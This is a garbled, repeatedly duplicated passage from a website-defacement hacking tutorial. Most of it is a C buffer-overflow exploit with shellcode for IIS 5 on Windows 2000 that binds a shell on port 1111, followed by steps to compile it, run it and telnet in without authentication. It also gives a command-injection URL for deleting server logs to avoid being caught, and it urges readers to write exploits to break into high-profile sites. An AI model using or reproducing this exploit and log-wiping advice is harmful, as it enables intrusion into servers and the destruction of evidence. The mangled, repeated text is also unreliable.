In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 22
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 23
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 24
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
